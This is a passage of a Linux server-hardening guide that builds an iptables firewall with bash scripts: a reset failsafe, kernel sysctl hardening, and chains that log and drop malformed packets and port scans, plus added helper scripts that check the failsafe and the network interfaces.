ShareWiz Ultra Secure Server Setup

Firewall Security

Introduction

A network firewall is a set of rules that allow or deny the passage of network traffic through one or more network devices. A network firewall may also perform more complex tasks, such as network address translation, bandwidth adjustment, encrypted tunnels and much more relating to network traffic.

The Linux kernel includes the Netfilter subsystem, which is used to manipulate or decide the fate of network traffic headed into or through your server. All modern Linux firewall solutions use this system for packet filtering.

When a packet reaches your server, it will be handed off to the Netfilter subsystem for acceptance, manipulation, or rejection based on the rules supplied to it from userspace.

Different kernel modules and programs are currently used for different protocols: iptables applies to IPv4, ip6tables to IPv6, arptables to ARP, and ebtables as a special case for Ethernet frames.

Many frontends are available to simplify the task of managing the firewall, but the primary user-space tool covered here is iptables.

Numerous other third-party firewall solutions such as ufw and ShoreWall can be used instead but these are not covered by this guide.


iptables

Sharewiz Implementation of iptables

There are many ways of establishing iptables rules on Linux; the approach taken here is a bash script, which allows conditional logic such as adding a group of rules only when the corresponding setting is enabled.


Uninstall ufw (Optional)

Issue the following command:

sudo aptitude remove --purge ufw

This is entirely optional, but as iptables is going to be used solely for managing the firewall, it makes sense to get rid of ufw.


Create the firewall directory

Issue the following command:

sudo mkdir /sharewiz/firewall/

All sharewiz scripts are kept in specific directories within the /sharewiz partition.


Create the firewall reset script

Issue the following command:

sudo vi /sharewiz/firewall/firewall-reset.sh

…add the following content to the file:

#!/bin/bash

#

# Resets all firewall rules

echo "Stopping firewall and allowing everyone..."

#

# Modify the following settings as required:

#

IPTABLES=/sbin/iptables

#

# Reset the default policies in the filter table.

#

$IPTABLES -P INPUT ACCEPT

$IPTABLES -P FORWARD ACCEPT

$IPTABLES -P OUTPUT ACCEPT

#

# Reset the default policies in the nat table.

#

$IPTABLES -t nat -P PREROUTING ACCEPT

$IPTABLES -t nat -P POSTROUTING ACCEPT

$IPTABLES -t nat -P OUTPUT ACCEPT

#

# Reset the default policies in the mangle table.

#

$IPTABLES -t mangle -P PREROUTING ACCEPT

$IPTABLES -t mangle -P POSTROUTING ACCEPT

$IPTABLES -t mangle -P INPUT ACCEPT

$IPTABLES -t mangle -P OUTPUT ACCEPT

$IPTABLES -t mangle -P FORWARD ACCEPT

#

# Flush all the rules in the filter, nat and mangle tables.

#

$IPTABLES -F

$IPTABLES -t nat -F

$IPTABLES -t mangle -F

#

# Erase all chains that are not default in filter, nat and mangle tables.

#

$IPTABLES -X

$IPTABLES -t nat -X

$IPTABLES -t mangle -X

This script completely clears the firewall and changes all policies to ACCEPT, so that the system is completely opened up.


Setup a failsafe when initially setting up the firewall

Prevent being locked out by iptables changes.

Issue the following command:

sudo vi /etc/cron.d/firewall-reset-sharewiz

…add the following content to the file:

0,10,20,30,40,50 * * * * root /sharewiz/firewall/firewall-reset.sh

This cron job flushes all firewall rules every 10 minutes. It is a safety feature that ensures we are not locked out of the system by a mistake in the firewall rules.

Once testing has been completed with the firewall, and it is running fine, then this cron job can be removed.
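The cron line above executes /sharewiz/firewall/firewall-reset.sh directly, so the failsafe only works if that script itself carries the execute bit (the guide sets it on the cron file, not on the script), and cron silently ignores /etc/cron.d entries that are writable by group or others. The following is an added example, not part of the ShareWiz guide: a bash check that the failsafe is actually in working order (script executable, cron file permissions cron accepts, the intended every-10-minutes schedule and root user), plus a tighter alternative that snapshots the live rules with iptables-save and restores them unless the operator confirms from the still-working session. The function names failsafe_check and apply_with_rollback are this example's own; the paths are arguments so the check can be exercised against scratch files.

```shell
#!/bin/bash
# Added example (not part of the ShareWiz guide): verify the lock-out
# failsafe before depending on it, and offer a tighter alternative.

# failsafe_check RESET_SCRIPT CRON_FILE
# Prints each finding; returns 0 only when every check passes.
failsafe_check() {
    local script="$1" cronfile="$2" rc=0 perms line min hour dom mon dow user

    [ -f "$script" ] || { echo "FAIL: reset script $script does not exist"; return 1; }
    [ -x "$script" ] || { echo "FAIL: $script is not executable (cron cannot run it)"; rc=1; }
    head -n 1 "$script" | grep -q '^#!' || { echo "FAIL: $script has no interpreter line"; rc=1; }

    [ -f "$cronfile" ] || { echo "FAIL: cron file $cronfile does not exist"; return 1; }
    # /etc/cron.d entries writable by group or others are ignored by cron.
    perms=$(stat -c '%a' "$cronfile" 2>/dev/null || stat -f '%Lp' "$cronfile")
    case "$perms" in
        *[2367]?|*[2367]) echo "FAIL: $cronfile is group/world writable ($perms); cron ignores it"; rc=1 ;;
    esac

    # First non-comment line that names the script: minute hour dom month dow user command
    line=$(grep -v '^#' "$cronfile" | grep -F -- "$script" | head -n 1)
    [ -n "$line" ] || { echo "FAIL: no cron entry runs $script"; return 1; }
    set -f                       # no pathname expansion of the '*' fields
    set -- $line
    set +f
    min=$1 hour=$2 dom=$3 mon=$4 dow=$5 user=$6
    case "$min" in
        '*/10'|'0,10,20,30,40,50') ;;
        *) echo "FAIL: minute field '$min' is not every 10 minutes"; rc=1 ;;
    esac
    [ "$hour$dom$mon$dow" = '****' ] || { echo "FAIL: entry is restricted to '$hour $dom $mon $dow', expected '* * * *'"; rc=1; }
    [ "$user" = root ] || { echo "FAIL: entry runs as '$user'; iptables needs root"; rc=1; }
    return "$rc"
}

# apply_with_rollback FIREWALL_SCRIPT [SECONDS]
# A tighter alternative to the 10-minute cron reset: snapshot the live
# rule set, run the script, and restore the snapshot unless the operator
# confirms within SECONDS (default 120). Needs root and iptables-save/restore.
apply_with_rollback() {
    local script="$1" wait="${2:-120}" saved
    saved=$(mktemp) || return 1
    iptables-save > "$saved" || { rm -f "$saved"; return 1; }
    "$script"
    echo "Rules applied; press Enter within ${wait}s to keep them, otherwise they are reverted."
    if read -r -t "$wait" _; then
        echo "Keeping the new rules."
    else
        iptables-restore < "$saved" && echo "Reverted to the previous rule set."
    fi
    rm -f "$saved"
}

# Usage: failsafe_check /sharewiz/firewall/firewall-reset.sh /etc/cron.d/firewall-reset-sharewiz
if [ "$#" -eq 2 ]; then
    failsafe_check "$1" "$2"
fi
```

Run the check with the two paths from this guide before trusting the cron failsafe; any FAIL line means the reset would never fire. apply_with_rollback is the pattern to prefer once the cron job has been removed, because the rollback happens on the same terminal that a bad rule set would have cut off.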


Make the firewall reset cron job executable

Issue the following command:

sudo chmod 755 /etc/cron.d/firewall-reset-sharewiz


Determine network interfaces to firewall

Obtain a list of all network interfaces, by issuing the following command:

sudo ip link show

which should display something like:

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:f2:4b:5d brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:14:28:ce brd ff:ff:ff:ff:ff:ff

lo exists on all machines and is used for communication between programs running on this machine.

eth0 and eth1 are the interfaces which will need to be firewalled.
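If the firewall script names an interface that does not exist on the host (eth0 on a system whose interfaces are called enp0s3, for example), the rules bound to it match nothing and the default DROP policy locks you out. The following is an added example, not part of the ShareWiz guide: a parser for ip link show output and a pre-flight check that the interfaces the script is configured for are present. The sample output is constructed in the format shown above (the MAC addresses are the ones printed there); ifaces_from_iplink and check_ifaces are this example's own names.

```shell
#!/bin/bash
# Added example (not part of the ShareWiz guide): confirm that the
# interfaces the firewall script will bind rules to really exist before
# running it.

# Constructed sample in the format of `ip link show`; the same parser also
# accepts the one-line-per-interface form printed by `ip -o link show`.
SAMPLE_IPLINK='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:f2:4b:5d brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast state DOWN qlen 1000
    link/ether 08:00:27:14:28:ce brd ff:ff:ff:ff:ff:ff'

# ifaces_from_iplink: reads `ip link show` output on stdin and prints
# "NAME STATE" for every interface except the loopback. Only the
# "N: NAME: <flags> ... state STATE" header of each interface is parsed;
# the indented link/... lines are skipped.
ifaces_from_iplink() {
    awk '$1 ~ /^[0-9]+:$/ && $2 ~ /:$/ {
        name = $2; sub(/:$/, "", name); sub(/@.*/, "", name)   # "eth0.10@eth0:" -> "eth0.10"
        if (name == "lo") next
        state = "UNKNOWN"
        for (i = 3; i < NF; i++) if ($i == "state") state = $(i + 1)
        print name, state
    }'
}

# check_ifaces "NAME STATE lines" WANTED...
# Returns 1 if any wanted interface is absent; warns (without failing)
# when one is present but not UP.
check_ifaces() {
    local detected="$1" want state rc=0
    shift
    for want in "$@"; do
        state=$(printf '%s\n' "$detected" | awk -v n="$want" '$1 == n { print $2 }')
        if [ -z "$state" ]; then
            echo "MISSING: $want is not present; rules using it would match nothing"
            rc=1
        elif [ "$state" != "UP" ]; then
            echo "WARN: $want is $state"
        fi
    done
    return "$rc"
}

# Usage on a live host, with the names INET_IFACE and LOCAL_IFACE hold in the firewall script:
#   check_ifaces "$(ip link show | ifaces_from_iplink)" eth0 eth1 || exit 1
if [ "$#" -gt 0 ]; then
    check_ifaces "$(ip link show | ifaces_from_iplink)" "$@"
fi
```

Run it with the interface names from the firewall script's configuration block as arguments; a non-zero exit means the script would be applying rules to a name this host does not have.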


Create a script file to configure the firewall

Issue the following command:

sudo vi /sharewiz/firewall/firewall.sh

…and add the following content to the file:

#!/bin/bash

#

# Modify the following settings as required:

#

IPTABLES=/sbin/iptables

#

#

# Internet Interface

INET_IFACE="eth0"

INET_IP="192.168.0.11"

#

# Local Interface Information

LOCAL_IFACE="eth1"

LOCAL_IP="192.168.1.1"

LOCAL_NET="192.168.1.1/24"

LOCAL_BCAST="192.168.1.255"

#

# Localhost Interface

#

LO_IFACE="lo"

LO_IP="127.0.0.1"

#

#

#*********************************************************

# Trusted hosts

#

# Hosts that are auto allowed into the system if WhiteListing

# is allowed.

#

TRUSTED_HOSTS="192.168.0.10"

UNTRUSTED_HOSTS="123.123.123.123,134.134.134.134"

#

#

#*********************************************************

# What to allow

#

# 0=no

# 1=yes

#

ALLOW_DHCP_BROADCAST_IN=0

ALLOW_ICMP_PARAM_PROBLEM_IN=0

 

ALLOW_CUPS_IN=0

ALLOW_CUPS_OUT=0

 

ALLOW_DNS_IN=0

ALLOW_DNS_OUT=1

 

ALLOW_FTP_IN=0

ALLOW_FTP_OUT=0

 

ALLOW_HTTP_IN=0

ALLOW_HTTP_OUT=1

 

ALLOW_HTTPS_IN=0

ALLOW_HTTPS_OUT=0

 

ALLOW_IMAP_IN=0

ALLOW_IMAP_OUT=0

 

ALLOW_MYSQL_IN=0

ALLOW_MYSQL_OUT=0

 

ALLOW_NFS_IN=0

ALLOW_NFS_OUT=0

 

ALLOW_NTP_IN=1

ALLOW_NTP_OUT=1

 

ALLOW_PING_IN=0

ALLOW_PING_OUT=1

 

ALLOW_POP3_IN=0

ALLOW_POP3_OUT=0

 

ALLOW_PRINT_IN=0 # Allow printer port

ALLOW_PRINT_OUT=0 # Allow printer port

 

ALLOW_SMTP_IN=0 # Do NOT allow unencrypted SMTP! Use SMTPS instead.

ALLOW_SMTP_OUT=0 # Do NOT allow unencrypted SMTP! Use SMTPS instead.

 

ALLOW_SMTPS_IN=0

ALLOW_SMTPS_OUT=0

 

ALLOW_SSH_IN=1

ALLOW_SSH_OUT=1

 

ALLOW_SQUID_IN=0 # SQUID proxy

ALLOW_SQUID_OUT=0 # SQUID proxy

 

ALLOW_TELNET_IN=0

ALLOW_TELNET_OUT=0

 

ALLOW_TRACEROUTE_IN=0

ALLOW_TRACEROUTE_OUT=1

 

ALLOW_XWINDOWS_IN=0

ALLOW_XWINDOWS_OUT=0

 

ALLOW_XWINDOWS_FONTSERVER_IN=0

ALLOW_XWINDOWS_FONTSERVER_OUT=0

 

BLOCK_FACEBOOK=0

BLOCK_FLOODS=0

BLOCK_SAMBA_WITHOUT_LOGGING=1

BLOCK_OVERSIZE_ICMP_PACKETS=1

BLOCK_VIRUSES=1

 

DO_BAD_PACKETS_LAST=0 # Less logging

DO_KERNEL_SECURE=1

DO_LOG_SCANS=0 # if 1 will log well known scans whilst dropping them

DO_MASQUERADE=0 # if 0 will use SNAT / DNAT

DO_QUICK_NTP=0 # if 1 will allow NTP in without any checks

DO_WHITELISTING=0 # Dangerous if set to 1

#

#

#*********************************************************

# Connection limits

#

CONNECTION_MAX=4

CONNECTION_TIMEOUT=60

#

#

#*********************************************************

# Log limit

#

LOG_LEVEL=7

#

#

#*********************************************************

# String Search Algorithm

#

STRING_ALGO="bm"

STRING_ALGO2="kmp"

#

#

#*********************************************************

# Flooding limits

#

#

# Limit for SYN-Flood detection

LIMIT_SYN="5/s"

#

# Burst Limit for SYN-Flood detection

LIMIT_SYN_BURST="10"

#

# Overall Limit for Logging in Logging-Chains

LIMIT_LOG="2/s"

#

# Burst Limit for Logging in Logging-Chains

LIMIT_LOG_BURST="10"

#

# Overall Limit for Ping-Flood-Detection

LIMIT_PING="5/s"

#

# Burst Limit for Ping-Flood-Detection

LIMIT_PING_BURST="10"

#

#

#**************************************************

#********** Do not edit beyond this line **********

#**************************************************

#

#

# IP Mask for all IP addresses

UNIVERSE="0.0.0.0/0"

#

# Ports for IRC-Connection-Tracking

PORTS_IRC="6665,6666,6667,6668,6669,7000"

#

# Ports for traceroute

PORTS_TRACEROUTE_SRC="32769:65535"

PORTS_TRACEROUTE_DEST="33434:33523"

#

# Specification of the high unprivileged IP ports.

PORTS_UNPRIV="1024:65535"

#

# Specification of X Window System (TCP)

PORTS_XWIN="6000:6063"

#

#

#*********************************************************

# Delete all existing rules

#

#

$IPTABLES -F

$IPTABLES -t nat -F

$IPTABLES -t mangle -F

$IPTABLES -X

$IPTABLES -t nat -X

$IPTABLES -t mangle -X

#

#

# Set Policies

# By default, drop everything except outgoing traffic

#

$IPTABLES -P INPUT DROP

$IPTABLES -P FORWARD DROP

$IPTABLES -P OUTPUT ACCEPT

#

#

#*********************************************************

#

# Kernel configuration.

# For details see:

# * http://www.securityfocus.com/infocus/1711

# * http://www.linuxgazette.com/issue77/lechnyr.html

# * http://ipsysctl-tutorial.frozentux.net/chunkyhtml/index.html

# * /usr/src/linux/Documentation/filesystems/proc.txt

# * /usr/src/linux/Documentation/networking/ip-sysctl.txt

#

# Save these settings in the /etc/sysctl.conf file to make it permanent

#

#

if [ $DO_KERNEL_SECURE -eq 1 ]

then

# Allow port forwarding - Enable IP NAT in the Linux kernel

#

echo 1 > /proc/sys/net/ipv4/ip_forward

#

#

# Disabling IP Spoofing

#

echo 2 > /proc/sys/net/ipv4/conf/all/rp_filter

#

#

# Enable IP spoofing protection (i.e. source address verification).

# Note: This is special, as it seems to only be enabled if you set

# */all/rp_filter AND */eth0/rp_filter (for example) to 1! Setting only

# */all/rp_filter alone does _not_ suffice, which is pretty counter-intuitive.

#

for i in /proc/sys/net/ipv4/conf/*/rp_filter; do echo 1 > $i; done

#

#

# Protect against SYN flood attacks (see http://cr.yp.to/syncookies.html).

#

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

#

#

# Ignore all incoming ICMP echo requests (i.e. disable ping).

# Usually not a good idea, as some protocols and users need/want this.

# echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

#

if [ $ALLOW_PING_IN -eq 0 ]

then

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

else

echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

fi

#

#

# Don't respond to broadcast pings

# Ignore ICMP echo requests to broadcast/multicast addresses. We do not

# want to participate in smurf (and similar) DoS attacks.

# For details see: http://en.wikipedia.org/wiki/Smurf_attack.

#

if [ $ALLOW_PING_IN -eq 0 ]

then

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

else

echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

fi

#

#

# Block source routing

#

echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route

#

#

# Don't accept source routed packets.

#

for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do echo 0 > $i; done

#

#

# Disable multicast routing. Should not be needed, usually.

# TODO: This throws an "Operation not permitted" error. Why?

# for i in /proc/sys/net/ipv4/conf/*/mc_forwarding; do echo 0 > $i; done

#

#

# Kill timestamps

#

echo 0 > /proc/sys/net/ipv4/tcp_timestamps

#

#

# Kill redirects

#

echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

#

#

# Don't accept or send ICMP redirects.

#

for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do echo 0 > $i; done

for i in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $i; done

#

#

# Enable secure redirects, i.e. only accept ICMP redirects for gateways

# listed in the default gateway list. Helps against MITM attacks.

#

for i in /proc/sys/net/ipv4/conf/*/secure_redirects; do echo 1 > $i; done

#

#

# Enable bad error message protection

# Don't log invalid responses to broadcast frames, they just clutter the logs.

#

echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

#

#

# Log martians

#

echo 1 > /proc/sys/net/ipv4/conf/all/log_martians

#

#

# Log packets with impossible addresses.

#

for i in /proc/sys/net/ipv4/conf/*/log_martians; do echo 1 > $i; done

#

#

# Disable bootp_relay. Should not be needed, usually.

#

for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do echo 0 > $i; done

#

#

# Disable proxy_arp. Should not be needed, usually.

#

for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do echo 0 > $i; done

#

#

# TODO: These may mitigate ARP poisoning attacks?

# /proc/sys/net/ipv4/neigh/*/locktime

# /proc/sys/net/ipv4/neigh/*/gc_stale_time

# TODO: Check rest of /usr/src/linux/Documentation/networking/ip-sysctl.txt.

# Are there any security-relevant options I missed? Check especially:

# icmp_ratelimit, icmp_ratemask, icmp_errors_use_inbound_ifaddr, arp_*.

#

#

# Set our local port range

#

#echo "32768 61000" > /proc/sys/net/ipv4/ip_local_port_range

#

#

# Reduce timeouts for DoS protection

#

echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout

#

#

# Other
#
# Note: tcp_window_scaling and tcp_sack are performance features, not security
# controls; disabling them caps TCP throughput on high-bandwidth or high-latency paths.
#

echo 2400 > /proc/sys/net/ipv4/tcp_keepalive_time

echo 0 > /proc/sys/net/ipv4/tcp_window_scaling

echo 0 > /proc/sys/net/ipv4/tcp_sack

#

#

fi

#

#

#*********************************************************

# Create the chains

#

$IPTABLES -N BAD_PACKETS

$IPTABLES -N BAD_TCP_PACKETS

if [ $DO_WHITELISTING -eq 1 ]

then

$IPTABLES -N WHITELIST

fi

$IPTABLES -N PRIVATE_PACKETS

$IPTABLES -N BLACKLIST

if [ $BLOCK_FLOODS -eq 1 ]

then

$IPTABLES -N FLOODS

fi

if [ $BLOCK_VIRUSES -eq 1 ]

then

$IPTABLES -N VIRUS

fi

if [ $DO_LOG_SCANS -eq 1 ]

then

$IPTABLES -N SCANS

fi

$IPTABLES -N ICMP_IN

$IPTABLES -N ICMP_OUT

$IPTABLES -N TCP_IN

$IPTABLES -N TCP_OUT

$IPTABLES -N UDP_IN

$IPTABLES -N UDP_OUT

$IPTABLES -N NO_LOGGING

#

#

#*********************************************************

# Filter BAD packets

#

#------------------------------------------

# For TCP packet check if they are bad.

#

if [ $DO_BAD_PACKETS_LAST -eq 1 ]

then

$IPTABLES -A BAD_PACKETS -p tcp -j BAD_TCP_PACKETS

fi

#

#

#------------------------------------------

# Drop packets received on the external interface

# claiming a source of the local network

#

$IPTABLES -A BAD_PACKETS -p all -i $INET_IFACE -s $LOCAL_NET -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=local-source a=DROP "

$IPTABLES -A BAD_PACKETS -p all -i $INET_IFACE -s $LOCAL_NET -j DROP

#

#

#------------------------------------------

# Drop INVALID packets immediately (not ESTABLISHED, RELATED or NEW)

#

# Note: ICMPv6 Neighbor Discovery packets remain untracked, and will

# always be classified "INVALID" though they are not corrupted or

# the like. Keep this in mind, and accept them before this rule!

# iptables -A INPUT -p 41 -j ACCEPT

#

$IPTABLES -A BAD_PACKETS -p all -m conntrack --ctstate INVALID -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=invalid a=DROP "

$IPTABLES -A BAD_PACKETS -p all -m conntrack --ctstate INVALID -j DROP

#

#

#------------------------------------------

# Drop packets with incoming fragments.

# This attack results in Linux Server panic resulting in possible data loss.

#

#$IPTABLES -A BAD_PACKETS -p all -f -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=fragmented a=DROP "

#$IPTABLES -A BAD_PACKETS -p all -f -j DROP

#

#

#------------------------------------------

# For TCP packet check if they are bad.

#

if [ $DO_BAD_PACKETS_LAST -eq 0 ]

then

$IPTABLES -A BAD_PACKETS -p tcp -j BAD_TCP_PACKETS

fi

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A BAD_PACKETS -j RETURN

#

#

#*********************************************************

# Filter bad TCP packets

#

# Flags are: SYN ACK FIN RST URG PSH ALL NONE

#

# The only flag that is allowed to be sent along

# with a SYN is ACK, and this only in the 2nd

# packet of the 3-way-handshake.

#

#

#------------------------------------------

# Malformed packets

#

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN,PSH,URG -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=XMAS-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=XMAS-PSH-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL ALL -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=XMAS-ALL-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL ALL -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FIN-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL FIN -j DROP

#

# Sending SYN in conjunction with RST is a violation of RFC 793 (a SYN/RST scan).

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYN/RST-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,RST SYN,RST -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYN/FIN-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL NONE -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Null-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL NONE -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP-ID-scan a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,RST FIN,RST -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:FIN/RST a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,RST FIN,RST -j DROP

#

# FIN scan, nmap v3.0 sends ACK,FIN FIN

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,ACK FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:FAF a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags FIN,ACK FIN -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,URG URG -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:AUU a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,URG URG -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,PSH PSH -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:APP a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,PSH PSH -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,FIN FIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:AFF a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags ACK,FIN FIN -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,URG SYN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=BAD_TCP:SUS a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-flags SYN,URG SYN -j DROP

#

#

#------------------------------------------

# Unclean packets... same idea as above. The "unclean" match was an experimental
# patch-o-matic module and is not present in current kernels, so these stay commented out.

#

#$IPTABLES -A BAD_TCP_PACKETS -i $INET_IFACE -m unclean -j LOG --log-prefix "pf=BAD_TCP:unclean a=DROP "

#$IPTABLES -A BAD_TCP_PACKETS -i $INET_IFACE -m unclean -j DROP

#

#

#------------------------------------------

# New connections that have no syn set are most probably bad.

# Also known as ACK scan

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --syn -m conntrack --ctstate NEW -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=new-not-syn a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --syn -m conntrack --ctstate NEW -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --tcp-flags SYN,RST,ACK SYN -m conntrack --ctstate NEW -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=new-not-syn2 a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp ! --tcp-flags SYN,RST,ACK SYN -m conntrack --ctstate NEW -j DROP

#$IPTABLES -A BAD_TCP_PACKETS -p tcp -m tcp ! --tcp-flags SYN,RST,ACK SYN -m state --state NEW -j REJECT --reject-with icmp-net-unreachable

#

#

#------------------------------------------

# Port 0 fingerprint attempt

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --dport 0 -m limit --limit 1/h --limit-burst 1 -j LOG --log-level $LOG_LEVEL --log-prefix "fp=TCP:finger:0 a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --dport 0 -j DROP

#

#

#------------------------------------------

# Invalid TCP Options

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 64 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level info --log-prefix "fp=TCP:Bad Option(64) a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 64 -j DROP

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 128 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level info --log-prefix "fp=TCP:Bad Option(128) a=DROP "

$IPTABLES -A BAD_TCP_PACKETS -p tcp --tcp-option 128 -j DROP

#

#

#------------------------------------------

# All good, so return

#

$IPTABLES -A BAD_TCP_PACKETS -p tcp -j RETURN

#

#

#*********************************************************

# Whitelisting

# Always allow these packets

#

#

# High-priority packets which should always be accepted without much

# delay.

#

# Using this chain will break firewall security and will result in

# this not passing certain security standards. However, there may

# be specific reasons where this might be useful.

#

#

#------------------------------------------

if [ $DO_WHITELISTING -eq 1 ]

then

#------------------------------------------

# Allow NTP

# To provide accurate timing, it is necessary to have a low delay

# when processing networking packets of the Network Time Protocol.

#

# These packets are sent as UDP packets to port 123. For this

# reason these packets are directly accepted, without checking

# further rules. These packets might originate from an attacker,

